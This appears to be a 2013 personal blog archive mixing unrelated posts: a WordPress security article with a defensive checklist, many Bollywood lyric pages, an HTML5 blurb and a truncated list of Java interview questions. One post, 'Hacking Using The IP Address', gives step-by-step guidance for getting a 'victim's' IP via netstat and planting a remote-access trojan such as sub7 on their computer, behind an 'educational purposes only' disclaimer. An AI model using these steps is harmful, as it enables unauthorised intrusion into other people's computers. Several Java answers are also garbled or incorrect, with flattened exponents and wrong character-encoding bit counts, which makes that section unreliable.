Wednesday, 25 December 2013

3 Sneaky Tricks Hackers Use to Target WordPress Sites

hacker-cartoon
The open source nature of WordPress has one downside, and if you’re not careful it could ruin your online business. I know this because it happened to me. Just a few months ago, I had a hacker hijack a WordPress site that was consistently earning me several hundred dollars a month.
The hacker:
  • Blocked all logins from my IP address
  • Deleted 217 pages of content, including over 50 pages of premium membership content.
  • Posted 182 spam articles on my site, all which were visible from the home page and which tanked my search engine rankings.
  • Changed the admin account to their email so that I could not update my password OR get back into the site

Thankfully, with a little research and my newly acquired knowledge of PHP MYSQL programming, I discovered three easy-to-correct vulnerabilities that I now believe every WordPress blogger needs to know about…
#1: Vulnerability to “Brute Force” Logins

Brute force logins are also called “cracks.”
A crack is when a hacker builds a program that generates thousands of new random passwords per minute and attempts to login to your application by stumbling upon the right combination. For example, let’s assume the hacker already knows that your primary username is “admin.”
All they need to do is crack the password using their trusty automated crack program. The program might start out its first 10 attempts by inputting:
1.     aaa111
2.     aaa112
3.     aaa113
4.     aaa114
5.     aaa115
6.     aaa116
7.     aaa117
8.     aaa118
9.     aaa119
10.   aaa120
As you can imagine, this would take ages without the assistance of a computer. But even the most amateur hackers have access to cracking tools, so you need to make your site as “crack proof” as possible.
(More on that in a second)
#2: Vulnerability to DNS Snooping

If your domain is publicly listed (check with your domain host) and hosted on a shared server, any hacker can use whois.com to find out who you’re hosted with, as well as information about your DNS server AND what other sites are hosted on the same server as yours.
They can also ping your site for the IP Address, feed it into sameip.org and come up with a list of the sites being co-hosted with yours.
If they can’t find a security hole in your WordPress site, they can still hack into the server if they find vulnerabilities on other sites hosted on the same server.
What they can do with this information will depend on their skill level and how much spare time they have between live action role playing games. Any reasonably experienced and moderately persistent hacker could:
1.     Use SQL injections to insert content (blog posts, etc) into your WordPress database and have it display on your WordPress site.
2.     Drop (i.e. delete) your entire WordPress database.
3.     Decode your user’s passwords (including yours) by reverse engineering the algorithm used to encrypt them.*
*Common encryption algorithms  such as MD5 and SHA are used in WordPress scripts and commonly known in the hacker world.
Again, we’ll cover a few precautions you can take to prevent this from happening, but it’s important that you know how your site may be at risk…
#3: Vulnerability to Plugin Hijacking

Right now you probably have at least a few WordPress plugins installed which are not up to date. Some of them aren’t even being updated by the developer anymore. This is a major security hole, especially if you’re receiving updates about the plugin in through your WordPress dashboard.
Those updates are likely being reported to you by a script that’s running on your server called a “cron job.” If a hacker discovers the “doorway” which that script is using to communicate with your WordPress site, they can create their own scripts that can interact or make changes to your WordPress site.
How easy is this?
First, the hacker finds a couple of WordPress plugins which are known to be out of date and which (at least at one time) installed a cron job on the host server. Then, they use a search program (similar to a spider) to harvest all the WordPress sites that have that plugin currently installed.
Once they’ve got that information, they can use a vulnerability in the plugin itself to access your WordPress scripts and, in some cases, your configuration file.
From there, they’ve got a buffet of options for turning the WordPress site you’ve worked so hard to build into a cesspool of spam articles…or  into barren wasteland, devoid of all your well-written content.
So, now that I’ve got you scared and aware about these vulnerabilities, here’s what you can do about them…
Checklist for Closing Up Known WordPress Security Holes
  1. NEVER leaving the generic username “admin” as your primary WordPress username, doing so makes it too easy to crack your WordPress admin password.
  2. Create an admin username password which are less memorable, but more secure than your current ones. For example, instead of using  something like your last name and date of birth, use a randomly generated password with numbers and letters and write it down somewhere that you can access it quickly.
  3. Don’t publicly display your WordPress username, create a nickname instead. You can do this from your WordPress profile in your admin dashboard).
  4. Limit the number of IPs users can login from in order to prevent brute force login attempts. Most WordPress membership plugins can do this, including the WPMU DEV plugins.
  5. Change your domain listing to private, if customers want to find out more about you and your company, create an information page for them.
  6. Get your own dedicated server as soon as financially possible.
  7. Have your web developer create a login script that limits failed login attempts and reports any suspicious logins to you. These are fairly easy to create, I built one in just 40 hours.
  8. Keep your WordPress plugins up to date with your current version of WordPress. Don’t use plugins which aren’t being maintained by the developer. I suggest becoming a Premium Member of WPMU DEV to permanently solve this problem.
  9. Avoid free WordPress themes and plugins at all costs, unless they’re being provided by someone who also sells premium products. People who are being paid for their work are more likely to stay on top of maintaining it. Again, I suggest you check out WPMU DEV.
  10.  If at all possible, use a Gmail account for your admin login rather than one attached to your domain name. This way it will be harder for hackers to guess the primary admin email for your domain.
  11.  Only run cron jobs which are 100% necessary for maintaining your WordPress site. Most cron jobs can be turned off from your cpanel, just make sure you don’t turn off one that you really need. See your web hosting company about this if you’re unsure.
Anymore questions or comments?
Post them here. I check reader feedback every day.
Happy and safe blogging my friends!

for more detail visit
http://premium.wpmudev.org/blog/3-sneaky-tricks-hackers-use-to-target-wordpress-sites/

DHOOM MACHALE DHOOM LYRICS - Dhoom 3

Katrina Kaif in Dhoom 3
Dhoom Machale Lyrics from Dhoom 3: The Title song of Dhoom 3 is finally here, The song is sung by Aditi Singh Sharma, composed by Pritam with lyrics penned by Sameer Anjaan.
Song: Dhoom Machale Dhoom
Singer: Aditi Singh Sharma
Music: Pritam
Lyrics: Sameer Anjaan
Cast: Aamir Khan, Katrina Kaif, Abhishek Bachchan, Uday Chopra
Music on: YRF Music

 

Dhoom Machale Dhoom Lyrics

You know that thing must be the hundred years old!

Dhoom Dhoom, Sar chadhi hai
Dhoom Dhoom, Bekhudi hai
Dhoom Dhoom, Race mein gum ho ja
One minute...

Dhoom Dhoom, khalbali hai
Dhoom Dhoom, har gali hai
Dhoom Dhoom, race mein tu kho ja

Dhoom nashaa hai
Dhoom junoon hai
Dhoom hai hulchul
Dhoom sukoon hai
Aaj tu sab kuchh bula ke jhoooom
Dhoom Machale...

We rock it, we roll it
So come on you people

Dhoom Machale, Dhoom Machale..
Dhoom Machale, Dhoom Machale..
Dhoom Machale, Dhoom Machale, Dhoom.. (x2)

Dhoom Dhoom, jism-o-jaan mein
Dhoom Dhoom, ho jahaan mein
Dhoom Dhoom, josh woh bhar ja
Let's Go!
Dhoom Dhoom, Har zubaan pe
Dhoom Dhoom, Zikr tera
Dhoom Dhoom, aisa kuchh kar ja

Ho... dhoom sharara
Dhoom ishara
Dhoom o yaara
Dhoom dobaara
Aaja dil se dil milake jhooooom...
C'mon...

Dhoom Machale...
We rock it, we roll it
You ready to party!

Dhoom Machale, Dhoom Machale..
Dhoom Machale, Dhoom Machale..
Dhoom Machale, Dhoom Machale Dhoom.. (x2)

Kar na fikar tu kal ki
Lutf le aaj ka
Zindagi hai bas do pal ki
Ek ek pal chura
Jee bhar ke jee le, jee le
Gham dhuein mein uda
Dhoom macha macha macha...

It's time now for a big big DHOOM!

Dhoom Machale, Dhoom Machale..
Dhoom Machale, Dhoom Machale..
Dhoom Machale, Dhoom Machale Dhoom.. (x2)

GOD, ALLAH aur BHAGWAN LYRICS - Krrish 3 | Sonu Nigam, Shreya Ghoshal

God Allah aur Bhagwan - Krrish 3
God Allah aur Bhagwan Lyrics from Krrish 3: A song that praises Krrish, sung by Sonu Nigam & Shreya Ghoshal, composed by Rajesh Roshan with lyrics penned by Sameer.
Song: God, Allah aur Bhagwan
Singers: Sonu Nigam, Shreya Ghoshal
Music: Rajesh Roshan
Lyrics: Sameer Anjaan
Cast: Hrithik Roshan, Priyanka Chopra, Kangana Ranaut, Vivek Oberoi, Rekha
Music on: T-Series

God Allah aur Bhagwan Lyrics

God, Allah aur Bhagwan
Ne banaya ik insaan

God, Allah aur Bhagwan
Ne banaya ik insaan
Aaya zameen pe lekar woh
Upar waale ka farmaan
Woh doston ka hai dost
Yaaron ka hai yaar
Jiska naam sunke kaanpe har shaitan (x2)

God, Allah aur Bhagwan
Ne banaya ek insaan

Woh tujhme bhi hai
Woh mujhme bhi hai
Kahin na kahin woh
Hum sab mein hai (x2)

Sab mein woh chhupa hai
Usey pehchaan le
Uska jo iraada hai
Hum thaan lein (x2)

Woh doston ka hai dost
Yaaron ka hai yaar
Jiska naam sunke kaanpe har shaitan

God, Allah aur Bhagwan
Ne banaya ek insaan (x2)

Jahaan kal woh tha akela khada
Kadam apna bhi udhar chal pada (x2)

Dil ke khabon ki jannat sajayenge hum
Pyar ka savera leke aayenge hum (x2)

Woh doston ka hai dost
Yaaron ka hai yaar
Jiska naam sunke kaanpe har shaitan

God, Allah aur Bhagwan
Ne banaya ek insaan (x2)

Read more: http://www.lyricsmint.com/2013/09/god-allah-aur-bhagwan-krrish-3.html#ixzz2oVqPcfQY

RAGHUPATI RAGHAV Lyrics - Krrish 3 Song

Raghupati Raghav - Hrithik Roshan & Priyanka Chopra in Krrish 3
Raghupati Raghav Lyrics from Krrish 3: The first song from Krrish 3 Raghupati Raghav Raja Ram is here which features Hrithik Roshan dancing with Priyanka Chopra. The song is composed by Rajesh Roshan and sung by Neeraj Shridhar, Monali Thakur & Bob.
Song: Raghupati Raghav
Singers: Neeraj Shridhar, Monali Thakur, Bob
Music: Rajesh Roshan
Lyrics: Sameer Anjaan
Cast: Hrithik Roshan, Priyanka Chopra, Kangana Ranaut, Vivek Oberoi, Rekha
Music on: T-Series

 

 

Raghupati Raghav Lyrics

Sabse haseen hai
Sabse juda hai
Woh dekho meri jaan

Pyaar ke liye hi duniya bani hai
Pyaar ka mila inaam

Raghupati Raghav...

Raghupati Raghav RajaRam
Raghupati Raghav RajaRam
Non-stop party
Aaj ki party
Celebrations tere naam (x2)

Raghupati Raghav Raja Ram
Raghupati Raghav Raja Ram
(Raghupati Raghav, Raghav....)

Kya raat hai, kya baat hai
Meri zindagi mere saath hai
Na chain hai na hosh
Har aarzoo madhosh hai

Maangi dua jo kabhi tere mere lab ne
Jaane tmanna poori ki usey Rab ne
Kaise karoon main shukriya
Raghupati Raghav
Raghupati Raghav
Raghupati Raghav Raja Ram
Non-stop party
Aaj ki party
Celebrations tere naam
Raghupati Raghav Raja Ram
Raghupati Raghav Raja Ram

What a groove!
I wanna move
Check it out!
Na na na na...

Rangon se bhi rangeen hai
Yeh pal bada namkeen hai
Phir ye samaa na aayega
Phir ye nasha na chhayega

Raina bhi khwabon ke charagon se saji hai
Mere khayalon mein bhi dhoom machi hai
Behke huey hai armaan

Hola Amigo!
Hola Amigo!
Hola Amigo, sabko salaam..
Hola Amigo, sabko salaam..
(Hola Amigo means "hello friend" in Spanish)

Raghupati Raghav Raja Ram
Raghupati Raghav Raja Ram (x2)

Non-stop party
Aaj ki party
Celebrations tere naam
Raghupati Raghav Raja Ram
Raghupati Raghav!

Raghupati Raghav!

Raghupati Raghav..
Raghupati Raghav....

Read more: http://www.lyricsmint.com/2013/09/raghupati-raghav-krrish-3.html#ixzz2oVpYF1Hn

Saturday, 21 December 2013

What is HTML 5?

HTML5 will be the new standars for HTML.

The previous version of HTML,HTML 4.01,came in 1999. The internet has changes significantly since then.
HTML5 is intended to subsume not only HTML 4,but also XHTML 1 and DOM Level 2 HTML.

HTML5 is designed to deliver almost everything you want to online without requiring plugin. it does everything from animation to apps, music to movies, and can also be build complicated applications that run in your browser.

HTML 5 is platform Independence so don't worry about platform. the HTML 5 is running every where like all browser,Phone,Tablet etc...

you can build a mobile apps and games in HTML5. the HTML5 provide many interface to create graphice and animation in HTML5 is easy.



Friday, 12 July 2013

Manmarziyan Lyrics from Lootera

Song : Manmarziyan
Movie : Lootera
Singer(s) : Shilpa Rao, Amitabh Bhattacharya, Amit Trivedi
Music By : Amit Trivedi
Lyricist(s) : Amitabh Bhattacharya
 
 
Yun to solah saawan aaye gaye
 Gaur nahi kiya humne
 Bhiga man ka aangan is martaba
 Kya jaane kya kiya tumne
 (Dil mein jaagi)
 Ishq waali manmarziyan manmarziyan
 Zid ki maari yun to solah
 Bholi bhaali saawan
 Mannmarziyan aaye gaye
 Mannmarziyan.....
 
 Abb talak se...
 Kuch alag si.. manmarziyan - 2
 Hum zameen pe bhiga man ka
 Toh falak se aangan
 Manmarziyan iss martaba
 Man marziyaan.....
 
 Sikkon jaise hai uchhaali..
 Manmarziyan.. manmarziyaan...
 Zidd ki maare yun to solah
 Bholi bhaali saawan
 Manmarziyaan manmarziyaan aaye gaye
 Be adab see par gazab see
 Manmarziyan manmarziyan
 
 Hosh khoya
 Par sambhali manmarziyan yun to solah
 Manmarziyaan saawn
 Zidd ki maari aaye gaye
 Bhuli bhali manmarziyan manmarziyan
 

Zinda Hoon Yaar Lyrics from Lootera

Song : Zinda Hoon Yaar
Movie : Lootera
Singer(s) : Amit Trivedi
Music By : Amit Trivedi
Lyricist(s) : Amitabh Bhattacharya
 
 


 (Mujhe chhod do mere haal pe - 2
 Zinda hoon yaar kaafi hai - 2) - 2
 
 Oh oh...(kaafi hai.....) - 2 
 
 Hawaaon se jo maanga hissa mera
 To badle main hawa ne saans di
 Akelepan se chedi jab guftagoo
 Mere dil ne aawaaz di
 Mere haathon hua jo kissa shuroo
 Usey pura toh karna hai mujhe
 Qabar par mere sar utha ke khadi ho zindagi
 Aise marna hai mujhe...
 Kuch maangna baaki nahi - 2
 Jitna mila kaafi hai zinda hoon yaar kaafi hai
 Mujhe chhod do mere haal pe - 2
 Zinda hoon yaar kaafi hai - 2
 Mujhe chhod do oh oh... - 2
 Mere haal pe - 8 
 

Monta Re Lyrics from Lootera

Song : Monta Re
Movie : Lootera
Singer(s) : Swanand Kirkire, Amitabh Bhattacharya
Music By : Amit Trivedi
Lyricist(s) : Amitabh Bhattacharya
 
 
(Kaagaz ke do pankh leke uda chala jaaye re
 Jahan nahi jaana tha ye wahin chala haye re
 Umar ka ye taana baana samajh na paaye re
 Zubaan pe jo moh maaya namak lagaye re
 Ke dekhe na bhaale na jaane na daaye re
 Disha haara kyaamon boka monta re) - 2
 
 Fateh kare qile saare bhed jaaye deewarein
 Prem koi sendh laage sendh lage re lage
 Agar magar bari bari jiya ko yun uchhale
 Jiya nahin gend laage gend lage re lage
 Maati ko ye chandan sa mathe pe sajaye re
 Zubaan pe jo moh maaya namak lagaye re
 Ke dekhe na bhale na jaane na daaye
 Disha haara kyaamun boka monta re
 

Shikayatein Lyrics from Lootera

Song : Shikayatein
Movie : Lootera
Singer(s) : Mohan Kanan, Amitabh Bhattacharya
Music By : Amit Trivedi
Lyricist(s) : Amitabh Bhattacharya
 
 
Shiqaayatein mitaane lagi... (subah bedaag hai) - 2
 Jo barf ko galane lagi (kahin to aag hai) - 2
 Naa udne ki iss dafaa thaani parindo ne bhi wafaa jaani
 Andhere ko baahon mein leke ujaale ne ghar basaaya hai
 Chooraya tha jo chukaya hai shikayatein mitaane lagi
 (Subah bedag hai) - 2 jo barf ko galane lagi
 
 Ek jeet tu hai ek haar main hoon
 Haar jeet jode jo taar main hoon
 Ek jeet tu hai ek haar main hoon.....
 Bataayein been galtiyaan ginaayein
 Sitare jab bhi sada sulaayein
 Luteroon ko baghban banaayein
 Nasibon ki baat hai - 2
 Zameer ki kahaani hai yeh (yehi bairaag hai) - 2
 Shikayatein mitaane lagi
 Naa udne ki iss dafaa thaani
 Parindo ne bhi wafaa jaani
 Andhere ko baahon mein leke
 Ujaale ne ghar basaaya hai
 Churaya tha jo chukaaya hai
 Shiqayatein mitaane lagi
 Subah bedaag hai - 2
 

Ankahee Lyrics from Lootera

Song : Ankahee
Movie : Lootera
Singer(s) : Amitabh Bhattacharya
Music By : Amit Trivedi
Lyricist(s) : Amitabh Bhattacharya
 
 
(Kya kabhi savera ha ha laata hai andhera ha ha
 Sukhi siyahi.... deti hai gawaahi.....
 Sadiyon puraani aisi ek kahaani
 Reh gayi reh gayi ankahee ankahee.. ...) - 2
 
 Kya kabhi bahar bhi peshgi laati hai
 Aane wale patjhar keeeeee
 O baarishein naaraazagi bhi jataa jaati hain
 Kabhi kabhi ambar keeeeeee
 Patte jo shaakhon se tute...
 Bewajah toh nahin ruthe hain sabhi......
 Khwabon ka jharokha ha ha sach tha ya dhokha.. ha ha
 Maatha sehla ke nindiya churaai
 Sadiyon puraani aisi ik kahaani
 Reh gayi reh gayi ankahee o ankahee....
 

Sawaar Loon Lyrics from Lootera

Song : Sawaar Loon
Movie : Lootera
Singer(s) : Monali Thakur
Music By : Amit Trivedi
Lyricist(s) : Amitabh Bhattacharya
 
 
(Hawa ke jhonke aaj mausamon se ruth gaye
 Gulon ki shokhiyaan jo bhanwre aake loot gaye
 Badal rahi hai aaj zindagi ki chaal zara
 Issi bahane kyun naa main bhi dil ka haal zara
 Sanwaar loon haaye sawaar loon - 2) - 2
 
 Baramade puraane hain nayi si dhup hai
 Jo palke khatkhata raha hai kiska roop hai
 Shararatein kare jo aise bhulke hijab
 Kaise usko naam se main pukar loon
 Sawaar loon sawaar loon - 2
 
 (Yeh saari koyalein bani hain aaj daakiyan
 Kuhoo kuhoo me chitthiyan padhe mazakiyaan) - 2
 Inhe kaho ki naa chhupaaye kisne hai likha bataaye
 Uski aaj main nazar utaar loon
 Sawaar loon haaye sawaar loon
 Sawaar loon sawaar loon
 Hawa ke jhonke aaj mausamon se ruth gaye
 Gulon ki shokhiyaan jo bhanwre aake loot gaye
 Badal rahi hai aaj zindagi ki chaal zara
 Issi bahane kyun naa main bhi dil ka haal zara
 

Hum Mar Jayenge Lyrics from Aashiqui 2

Song : Hum Mar Jayenge
Movie : Aashiqui 2
Singer(s) : Tulsi Kumar, Arijit Singh
Music By : Jeet Gangulli
Lyricist(s) : Irshad Kamil
 
 
Apni aankhein khaali kar de
 Kaash tu meri aankhein bhar de - 2
 
 (Mere yaara tere gham agar payenge
 Humein teri hai kasam hum sanwar jayenge) - 2
 Do yeh saugaat tum tto zamaane ki hum - 2
 Har khushi se mukar jayenge
 Hum mar jayenge ho o o o hum mar jayenge
 Mere yaara tere gham agar payenge
 Humein teri hai kasam hum sanwar jayenge
 
 Tere kaandhe se hi lag ke yaara beete umar saari
 Socho kaisi hogi kismat hua yun tho phir humaari
 Saare aansoon toh ho tere aur aankhein ho humaari
 Tere dard humein jo mile pyaar mein - 2
 Hum khushi se yun bhar jaayenge
 Hum mar jaayenge ho o o o hum mar jaayenge
 Mere yaara tere gham agar paayenge
 Humein teri hai kasam hum sanwar jaayenge
 
 Chahe dukh ho chahe sukh ho dil ne tujhko hi pukaara
 Tune humko hai banaaya tune humko hai sanwaara
 Jahaan ko rab ka hai humein tera hai sahaara
 Bas tera saath ho chaahe jo baat ho - 2
 Tere kehne se kar jaayenge
 Hum mar jaayenge o o o hum mar jaayenge
 (Mere yaara tere gham agar paayenge
 Humein teri hai kasam hum sanwar jaayenge) - 2
 

Meri Aashiqui Lyrics from Aashiqui 2

Song : Meri Aashiqui
Movie : Aashiqui 2
Singer(s) : Arijit Singh, Palak Muchha
Music By : Mithoon
Lyricist(s) : Mithoon, Irshad Kamil
 
 
Tu mujhe chhod jaaye yeh nahi ho sakta saathiya
 Meri baaton mein tera zikr sadaa meri yaad mein teri fikr sadaa
 Main jo bhi hoon tum hi to ho mujhe tum se mili apni adaa
 Kyunki tum hi ho ab tum hi ho zindagi ab tum hi ho..
 Chain bhi mera dard bhi meri aashiqui ab tum hi ho
 Tum hi ho tum hi ho arz bhi mera marz bhi
 Chain bhi mera dard bhi meri aashiqui ab tum hi ho
 
 Tere liye hi jiya main khud ko jo yun de diya hai
 Teri wafa ne mujhko sambhala saare ghamon ko dil se nikaala
 Main jo mit bhi gaya tho wajood mera sadaa tujh mein rahe zinda hmm
 Kyun ki tum hi ho abb tum hi ho ki zindagi abb tum hi ho woh o
 Chain bhi mera dard bhi meri aashiqui abb tum hi ho
 Tum hi ho tum hi ho karz bhi mera marz bhi
 Chain bhi mera dard bhi meri aashiqui ab tum hi ho
 

Piya Aaye Na Lyrics from Aashiqui 2

Song : Piya Aaye Na
Movie : Aashiqui 2
Singer(s) : Tulsi Kumar, KK
Music By : Jeet Gangulli
Lyricist(s) : Irshad Kamil
 
 
Teri khata hai mere jiya - 2
 Unnpe bharosa kyun tune kiya
 Sab jhuthe jhuthe waade thhe unke
 Chal pichhe pichhe aaya tu jinke
 Woh piya aaye na - 2 piya aaye na woh piya aaye na
 Ab sabhi unn khwaabon ki tu dagar chhod de
 Ab sabhi unn khwaabon ko tu khud hi tod de
 Woh piya aaye na - 2 piya aaye na woh.. piya aaye na
 Teri khata hai mere jiya - 2
 
 Har khata ki hoti hai koi na koi sazaa
 Gham likhe ho kismat mein to ban hi jaati wajah
 Ab sabhi gham ashqon mein simat se gaye
 Ab sabhi aansu palkon se lipat se gaye
 Woh piya aaye na woh piya aaye na - 2
 
 Sach laga tha jo bewajah humko woh bharam ho gaya hai
 Bhor aane thhe jis fasaane mein woh khatam ho gaya
 Bhule hum bhule woh kaise sabse kahein baat yeh
 Ab chalo hum dhire dhire bihal se gaye
 Ab chalo hum jaise bhi ho sambhal se gaye
 Woh piya aaye na woh.. piya aaye na - 4
 Piya aaye na
 Teri khata hai mere jiya - 2
 Unnpe bharosa kyun tune kiya
 

Chahun Main Ya Na Lyrics from Aashiqui 2

 
 
Song : Chahun Main Ya Na
Movie : Aashiqui 2
Singer(s) : Palak Muchhal, Arijit Singh
Music By : Jeet Gangulli
Lyricist(s) : Irshad Kamil
 
(Tu hi ye mujhko bata de chahun main ya naa
 Apne tu dil ka pata de chahun main ya naa) - 2
 Itna bata doon tujhko chaahat pe apni mujhko
 Yun tto nahi ikhtiyaar phir bhi yeh socha dil ne
 Ab jo laga hoon milne puchhu tujhe ek baar
 Tu hi ye mujhko bata de chahun main ya naa
 Apne tu dil ka pata de chahun main ya naa
 
 Aisi kabhi pehle hui naa thi khwaahishein
 O o o kisi se bhi milne ki naa ki thi koshishein
 Uljhan meri suljha de chaahun main ya naa
 Aankhon aankhon mein jataa de chaahun main ya naa
 
 Mere chhote chhote khwaab hain khwabon mein geet hain
 Geeton mein zindagi hai chaahat hai preet hai
 Abhi main na dekhoon khwaab wo jin mein na tu mile
 Le khole honth maine ab tak the jo sile
 Mujhko na jitna mujh pe utna iss dil ko tujh pe
 Hone laga aitbaar tanha lamhon mein apne
 Bunti hoon tere sapne tujhse hua mujhko pyaar o o o
 Puchungi tujhko kabhi naa chaahun main ya naa....
 Tere khaabon mein ab jina chaahun main kyun naa..
 
 Tu hi yeh mujhko bata de chahun main ya naa
 Apne tu dil ka pata de chahun main ya naa
 
 
 

Sun Raha Hai Lyrics from Aashiqui 2

 
 
Song : Sun Raha Hai
Movie : Aashiqui 2
Singer(s) : Ankit Tiwari
Music By : Ankit Tiwari
Lyricist(s) : Sandeep Nath
 
Apne karam ki kar adaayein
 Yaara yaaraa yaara.......
 
 Mujhko iraade de kasamein de waade de
 Meri duaaon ke ishaaron ko sahaare de
 Dil ko thikaane de naye bahaane de
 Khaabon ki baarishon ko mausam ke paimane de
 Apne karam ki kar adaayein
 Kar de idhar bhi tu nigaahein
 (Sun raha hai naa tu ro raha hun main
 Sun raha hai naa tu kyun ro raha hun main) - 2
 
 Manzilein ruswa hain khoya hai raasta
 Aaye le jaaye itni si iltejaa
 Ye meri zamanat hai tu meri amaanat hai haan
 Apne karam ki kar adayein
 Kar de idhar bhi tu nigaahein
 Sun raha hai naa tu ro raha hoon main
 Sun raha hai naa tu kyun ro raha hun main
 
 Waqt bhi thehara hai kaise kyun ye huaa
 Kaash tu aise aaye jaise koi duaa
 Tu rooh ki raahat hai tu meri ibaadat hai.....
 Apne karam ki kar adaayein
 Kar de idhar bhi tu nigaahein
 (Sun raha hai naa tu ro raha hoon main
 Sun raha hai naa tu kyun ro raha hun main) - 4
 Yaaraa....

Tum Hi Ho Lyrics from Aashiqui 2

 
 
Song : Tum Hi Ho
Movie : Aashiqui 2
Singer(s) : Arijit Singh
Music By : Mithoon
Lyricist(s) : Mithoon
 
 
(Hum tere bin ab reh nahi sakte
 Tere bina kya wajood mera) - 2
 Tujhse juda gar ho jaayenge
 Toh khud se hi ho jaayenge judaa
 Kyunki tum hi ho ab tum hi ho zindagi ab tum hi ho
 Chain bhi mera dard bhi meri aashiqui ab tum hi ho
 
 Tera mera rishta hai kaisa ek pal door gawara nahi
 Tere liye har roz hai jeete tujh ko diya mera waqt sabhi
 Koi lamha mera na ho tere bina har saans pe naam tera
 Kyunki tum hi ho ab tum hi ho zindagi ab tum hi ho
 Chain bhi mera dard bhi meri aashiqui ab tum hi ho
 
 Tumhi ho..... tumhi ho.......
 Tere liye hi jiya main khud ko jo yun de diya hai
 Teri wafa ne mujhko sambhala saare ghamon ko dil se nikala
 Tere saath mera hai nasib juda tujhe paake adhura naa raha hmm..
 (Kyunki tum hi ho ab tum hi ho zindagi ab tum hi ho..
 Chain bhi mera dard bhi meri aashiqui ab tum hi ho) - 2

Hacking Using The IP Address

[DONT BLAME US!]
This Blog cannot be held responseable for the actions of its users in any way, any infomation you gain from this website is for educational purposes only. 
[IP ADDRESS]
If you want to gain acsess to a computer first you will need there ip address, i recommend you use command or cmd. If you dont no what this is stop now. To open up cmd go to start>Run>(then type cmd)and press enter.
 
I recommend that you use msn messenger while trying to get someones ip address, first what you do is:
>open msn messenger and sign in.
>open cmd (see above) and type in ''netstat''
>You will see a few ip addresses in the foreign address list.
>write these down or make a note of them.
>Now start sending a file to your victim using msn messenger
>After they accept the file open cmd and type in netstat again
>The ip address that is in the foregin list that wasent there before is the ip of you victim.
[TROJANS]
Now that you have your victims ip address you now need a trojan software such as sub7 this software is also known as RATS (im not listing RATS you can find them out for yourself but i will post i link at bottom of website that might help you) Once you have the software (RAT) you will need to send the victim your server, (WARNING! if you victim has a firewall or anti - virus software then you've had it cause the firwall will block you out and the anti - virus software will delete your server. but if you lucky and your victim is a idiot and has no security on there pc then just send them it and use the ip address you found to connect to them.
computer_virus.jpg
[CMD COMMANDS]
Netstat = displays ip address connected to your computer (victims)
Ping [IP] = shows if the ip specified is real
Nbtstat -a [IP] = if this shows a list of stuff and a 20 in one of the rows then you can do stuff.

Monday, 8 July 2013

JAVA Interview Question

61. What value does read() return when it has reached the end of a file?
        The read() method returns -1 when it has reached the end of a file.

62. Can a Byte object be cast to a double value?
        No, an object cannot be cast to a primitive value.

63. What is the difference between a static and a non-static inner class?
        A non-static inner class may have object instances that are associated with instances of the class's outer class. A static inner class does not have any object instances.

64. What is an object's lock and which object's have locks?
        An object's lock is a mechanism that is used by multiple threads to obtain synchronized access to the object. A thread may execute a synchronized method of an object only after it has acquired the object's lock. All objects and classes have locks. A class's lock is acquired on the class's Class object.

65. What is the % operator?
        It is referred to as the modulo or remainder operator. It returns the remainder of dividing the first operand by the second operand.

66. When can an object reference be cast to an interface reference?
        An object reference be cast to an interface reference when the object implements the referenced interface.

67. Which class is extended by all other classes?
        The Object class is extended by all other classes.

68. Which non-Unicode letter characters may be used as the first character of an identifier?
        The non-Unicode letter characters $ and _ may appear as the first character of an identifier

69. What restrictions are placed on method overloading?
        Two methods may not have the same name and argument list but different return types.

70. What is casting?
        There are two types of casting, casting between primitive numeric types and casting between object references. Casting between numeric types is used to convert larger values, such as double values, to smaller values, such as byte values. Casting between object references is used to refer to an object by a compatible class, interface, or array type reference.

71. What is the return type of a program's main() method?
        void.

72. If a variable is declared as private, where may the variable be accessed?
        A private variable may only be accessed within the class in which it is declared.

73. What do you understand by private, protected and public?
        These are accessibility modifiers. Private is the most restrictive, while public is the least restrictive. There is no real difference between protected and the default type (also known as package protected) within the context of the same package, however the protected keyword allows visibility to a derived class in a different package.

74. What is Downcasting ?
        Downcasting is the casting from a general to a more specific type, i.e. casting down the hierarchy

75. What modifiers may be used with an inner class that is a member of an outer class?
        A (non-local) inner class may be declared as public, protected, private, static, final, or abstract.

76. How many bits are used to represent Unicode, ASCII, UTF-16, and UTF-8 characters?
        Unicode requires 16 bits and ASCII require 7 bits Although the ASCII character set uses only 7 bits, it is usually represented as 8 bits. UTF-8 represents characters using 8, 16, and 18 bit patterns. UTF-16 uses 16-bit and larger bit patterns.

77. What restrictions are placed on the location of a package statement within a source code file?
        A package statement must appear as the first line in a source code file (excluding blank lines and comments).

78. What is a native method?
        A native method is a method that is implemented in a language other than Java.

79. What are order of precedence and associativity, and how are they used?
        Order of precedence determines the order in which operators are evaluated in expressions. Associatity determines whether an expression is evaluated left-to-right or right-to-left.

80. Can an anonymous class be declared as implementing an interface and extending a class?
        An anonymous class may implement an interface or extend a superclass, but may not be declared to do both.

81. What is the range of the char type?
        The range of the char type is 0 to 216 - 1 (i.e. 0 to 65535.)

82. What is the range of the short type?
        The range of the short type is -(215) to 215 - 1. (i.e. -32,768 to 32,767)

83. Why isn't there operator overloading?
        Because C++ has proven by example that operator overloading makes code almost impossible to maintain.

84. What does it mean that a method or field is "static"?
        Static variables and methods are instantiated only once per class. In other words they are class variables, not instance variables. If you change the value of a static variable in a particular object, the value of that variable changes for all instances of that class. Static methods can be referenced with the name of the class rather than the name of a particular object of the class (though that works too). That's how library methods like System.out.println() work. out is a static field in the java.lang.System class.

85. Is null a keyword?
        The null value is not a keyword.

86. Which characters may be used as the second character of an identifier, but not as the first character of an identifier?
        The digits 0 through 9 may not be used as the first character of an identifier but they may be used after the first character of an identifier.

87. Is the ternary operator written x : y ? z or x ? y : z ?
        It is written x ? y : z.

88. How is rounding performed under integer division?
        The fractional part of the result is truncated. This is known as rounding toward zero.

89. If a class is declared without any access modifiers, where may the class be accessed?
        A class that is declared without any access modifiers is said to have package access. This means that the class can only be accessed by other classes and interfaces that are defined within the same package.

90. Does a class inherit the constructors of its superclass?
        A class does not inherit constructors from any of its superclasses.

91. Name the eight primitive Java types.
        The eight primitive types are byte, char, short, int, long, float, double, and boolean.

92. What restrictions are placed on the values of each case of a switch statement?
        During compilation, the values of each case of a switch statement must evaluate to a value that can be promoted to an int value.

93. What is the difference between a while statement and a do while statement?
        A while statement checks at the beginning of a loop to see whether the next loop iteration should occur. A do while statement checks at the end of a loop to see whether the next iteration of a loop should occur. The do whilestatement will always execute the body of a loop at least once.

94. What modifiers can be used with a local inner class?
        A local inner class may be final or abstract.

95. When does the compiler supply a default constructor for a class?
        The compiler supplies a default constructor for a class if no other constructors are provided.

96. If a method is declared as protected, where may the method be accessed?
